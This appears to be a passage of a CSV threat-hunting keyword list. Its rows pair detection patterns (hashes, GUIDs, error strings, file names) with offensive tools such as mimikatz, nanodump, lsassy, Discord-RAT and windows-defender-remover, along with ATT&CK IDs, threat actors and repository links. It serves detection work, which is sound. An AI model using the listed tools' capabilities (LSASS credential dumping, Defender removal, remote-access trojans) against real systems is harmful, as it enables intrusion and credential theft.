"*fa9eb14e832e32c6a7bc4c1a2a4aa2db3c94a43316ac8d702a983db4bf2b4c68*",".{0,1000}fa9eb14e832e32c6a7bc4c1a2a4aa2db3c94a43316ac8d702a983db4bf2b4c68.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","44379"
"*fa9f88fe906846df3284e667263453cd96464c12d7f152ba27b2a5669a148c73*",".{0,1000}fa9f88fe906846df3284e667263453cd96464c12d7f152ba27b2a5669a148c73.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","44380"
"*faa491fa7733cf0c51ffdcf97be3fd48231863ff59b4f6922e11bbb747bf1806*",".{0,1000}faa491fa7733cf0c51ffdcf97be3fd48231863ff59b4f6922e11bbb747bf1806.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","#filehash","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","44381"
"*FAA8C7E2-4409-44F5-B2CA-EBBA4D4F41F0*",".{0,1000}FAA8C7E2\-4409\-44F5\-B2CA\-EBBA4D4F41F0.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","#GUIDproject","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","44383"
"*faaafe6256f59d72d96a71d7c12dccb964338c7ef8b9dbf359503ccd2ce79e41*",".{0,1000}faaafe6256f59d72d96a71d7c12dccb964338c7ef8b9dbf359503ccd2ce79e41.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","44384"
"*faab30099ca682a0b9f183c1e0319a6e16656e09bdcbfa410a590e07694c2850*",".{0,1000}faab30099ca682a0b9f183c1e0319a6e16656e09bdcbfa410a590e07694c2850.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","44385"
"*fab5a95a10d4db67572f75b372b00c91484dbb600f14cc619f3cecefe2d117cf*",".{0,1000}fab5a95a10d4db67572f75b372b00c91484dbb600f14cc619f3cecefe2d117cf.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","44387"
"*faca9e856c369b63d6698c74b1d59b062a9a8d9fe84b8f753c299c9961026395*",".{0,1000}faca9e856c369b63d6698c74b1d59b062a9a8d9fe84b8f753c299c9961026395.{0,1000}","offensive_tool_keyword","passwordfox","recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox","T1555.003 - T1003 - T1083","TA0006 ","N/A","LockBit - GoGoogle - 8BASE - XDSpy","Credential Access","https://www.nirsoft.net/utils/passwordfox.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","44388"
"*fad2d0ab934c4637113555b877e2b3162b0db531baff55f1d4d20567df755d08*",".{0,1000}fad2d0ab934c4637113555b877e2b3162b0db531baff55f1d4d20567df755d08.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","44389"
"*fad52d687cfe0824b40ba5fd96a6a3034537fc33c59d628049de8b93c4364ce9*",".{0,1000}fad52d687cfe0824b40ba5fd96a6a3034537fc33c59d628049de8b93c4364ce9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44393"
"*fad707c342f6f41c9f76434d28df10df06a52c924fd915b09951bd2c62294f7a*",".{0,1000}fad707c342f6f41c9f76434d28df10df06a52c924fd915b09951bd2c62294f7a.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","44394"
"*fadbef698c9003c4083458db5c37a5dc96791e3e8f532db1f386a53b3ff55776*",".{0,1000}fadbef698c9003c4083458db5c37a5dc96791e3e8f532db1f386a53b3ff55776.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","44396"
"*fadfbd1210e864f660aabfc5cb6ae807721ae2d54df0e328d13bc62bcec66e6f*",".{0,1000}fadfbd1210e864f660aabfc5cb6ae807721ae2d54df0e328d13bc62bcec66e6f.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","44397"
"*fadfbd1210e864f660aabfc5cb6ae807721ae2d54df0e328d13bc62bcec66e6f*",".{0,1000}fadfbd1210e864f660aabfc5cb6ae807721ae2d54df0e328d13bc62bcec66e6f.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","44398"
"*Fadi002/unshackle*",".{0,1000}Fadi002\/unshackle.{0,1000}","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","1","#linux #windows","N/A","10","10","1899","125","2023-11-10T19:48:10Z","2023-07-19T22:30:28Z","44399"
"*faeb33a916c28f17388206689e255337bd5719690602b2b18c6577fdf036f9e4*",".{0,1000}faeb33a916c28f17388206689e255337bd5719690602b2b18c6577fdf036f9e4.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","44401"
"*faf479fbf0d01c79ff3972881840913b6c18a24f2b51e7e29050c45760f0ea21*",".{0,1000}faf479fbf0d01c79ff3972881840913b6c18a24f2b51e7e29050c45760f0ea21.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","44404"
"*faf7eccc7aa509a6ac4b65b15e5bd91101a21ec9dd519b9917e7f0ce5f9191e5*",".{0,1000}faf7eccc7aa509a6ac4b65b15e5bd91101a21ec9dd519b9917e7f0ce5f9191e5.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","44405"
"*FAFE5A3C-05BC-4B6F-8BA4-2B95027CBFEA*",".{0,1000}FAFE5A3C\-05BC\-4B6F\-8BA4\-2B95027CBFEA.{0,1000}","offensive_tool_keyword","PrivFu","SeTcbPrivilege exploitation","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","#GUIDproject","PrivFu\PowerOfTcb","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","44407"
"*Fahrj/reverse-ssh*",".{0,1000}Fahrj\/reverse\-ssh.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","1","N/A","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","44408"
"*fail to retrieve SAM hashs!*",".{0,1000}fail\sto\sretrieve\sSAM\shashs!.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","script content","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","44409"
"*Failed in m1n1dumpIT:*",".{0,1000}Failed\sin\sm1n1dumpIT\:.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","N/A","N/A","10","1","31","79","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z","44410"
"*Failed logins before lockout is: *max_sam_lock*",".{0,1000}Failed\slogins\sbefore\slockout\sis\:\s.{0,1000}max_sam_lock.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","44411"
"*Failed to allocate memory for shellcode:*",".{0,1000}Failed\sto\sallocate\smemory\sfor\sshellcode\:.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#content","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","44412"
"*Failed to change shellcode memory protection*",".{0,1000}Failed\sto\schange\sshellcode\smemory\sprotection.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#content","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","44413"
"*Failed to create a dump of the forked process*",".{0,1000}Failed\sto\screate\sa\sdump\sof\sthe\sforked\sprocess.{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","0","#content","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","44414"
"*Failed to dump lsass*",".{0,1000}Failed\sto\sdump\slsass.{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","0","#content","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","44415"
"*Failed to find rx section offset*",".{0,1000}Failed\sto\sfind\srx\ssection\soffset.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#content","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","44416"
"*Failed to hijack thread:*",".{0,1000}Failed\sto\shijack\sthread\:.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#content","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","44417"
"*Failed to overwrite the .text section of ntdll.dll*",".{0,1000}Failed\sto\soverwrite\sthe\s\.text\ssection\sof\sntdll\.dll.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#content","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","44418"
"*Failed to receive initial tun stream message:*",".{0,1000}Failed\sto\sreceive\sinitial\stun\sstream\smessage\:.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","#content","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","44419"
"*failed to shut down Tor -- possible bug in bine*",".{0,1000}failed\sto\sshut\sdown\sTor\s\-\-\spossible\sbug\sin\sbine.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","Black Basta","Defense Evasion","https://github.com/cmars/onionpipe","1","0","N/A","N/A","10","6","553","33","2025-04-22T16:34:56Z","2022-01-23T06:52:13Z","44421"
"*Failed to write shellcode to target process*",".{0,1000}Failed\sto\swrite\sshellcode\sto\starget\sprocess.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#content","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","44422"
"*Fake Computer Objects Honey Pots*",".{0,1000}Fake\sComputer\sObjects\sHoney\sPots.{0,1000}","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","N/A","8","3","282","57","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z","44423"
"*Fake Service Accounts Honey Tokens*",".{0,1000}Fake\sService\sAccounts\sHoney\sTokens.{0,1000}","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","N/A","8","3","282","57","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z","44424"
"*fake_ap.py*",".{0,1000}fake_ap\.py.{0,1000}","offensive_tool_keyword","Rudrastra","Make a Fake wireless access point aka Evil Twin","T1491 - T1090.004 - T1557.001","TA0040 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/SxNade/Rudrastra","1","1","N/A","N/A","8","1","67","21","2023-04-22T15:10:42Z","2020-11-05T09:38:15Z","44425"
"*fake_common_roots.txt*",".{0,1000}fake_common_roots\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","44426"
"*fake_default_wordlist.txt*",".{0,1000}fake_default_wordlist\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","44427"
"*fake_evernote_clipper*",".{0,1000}fake_evernote_clipper.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","44428"
"*fake_flash_update*",".{0,1000}fake_flash_update.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","0","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","44429"
"*fake_hostnames(hostnames_list)*",".{0,1000}fake_hostnames\(hostnames_list\).{0,1000}","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/xFreed0m/RDPassSpray","1","0","N/A","N/A","10","7","648","244","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z","44430"
"*fake_lastpass/*",".{0,1000}fake_lastpass\/.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","44431"
"*fake_notification_ff/*",".{0,1000}fake_notification_ff\/.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","44432"
"*FakeAMSI.c*",".{0,1000}FakeAMSI\.c.{0,1000}","offensive_tool_keyword","FakeAMSI","Technically. AMSI is a set of DLLs being asked for a buffer evaluation (saying it's safe/unsafe). It means. processes (such as powershell.exe) load such DLLs when want to use AMSI. And it sounds like perfect opportunity to misuse such DLL as a method of persistence","T1117  - T1027","TA0003 ","N/A","N/A","Persistence","https://github.com/gtworek/PSBits/tree/master/FakeAMSI","1","1","N/A","N/A","N/A","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","44433"
"*FakeAMSI.dll*",".{0,1000}FakeAMSI\.dll.{0,1000}","offensive_tool_keyword","FakeAMSI","Technically. AMSI is a set of DLLs being asked for a buffer evaluation (saying it's safe/unsafe). It means. processes (such as powershell.exe) load such DLLs when want to use AMSI. And it sounds like perfect opportunity to misuse such DLL as a method of persistence","T1117  - T1027","TA0003 ","N/A","N/A","Persistence","https://github.com/gtworek/PSBits/tree/master/FakeAMSI","1","1","N/A","N/A","N/A","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","44434"
"*FakeAMSI.exe*",".{0,1000}FakeAMSI\.exe.{0,1000}","offensive_tool_keyword","FakeAMSI","Technically. AMSI is a set of DLLs being asked for a buffer evaluation (saying it's safe/unsafe). It means. processes (such as powershell.exe) load such DLLs when want to use AMSI. And it sounds like perfect opportunity to misuse such DLL as a method of persistence","T1117  - T1027","TA0003 ","N/A","N/A","Persistence","https://github.com/gtworek/PSBits/tree/master/FakeAMSI","1","1","N/A","N/A","N/A","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","44435"
"*FakeCmdLine.*",".{0,1000}FakeCmdLine\..{0,1000}","offensive_tool_keyword","FakeCmdLine","Simple demonstration (C source code and compiled .exe) of a less-known (but documented) behavior of CreateProcess() function. Effectively you can put any string into the child process Command Line field.","T1059 - T1036","TA0003","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/FakeCmdLine","1","1","N/A","N/A","N/A","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","44436"
"*FakeCmdLine.exe*",".{0,1000}FakeCmdLine\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","44437"
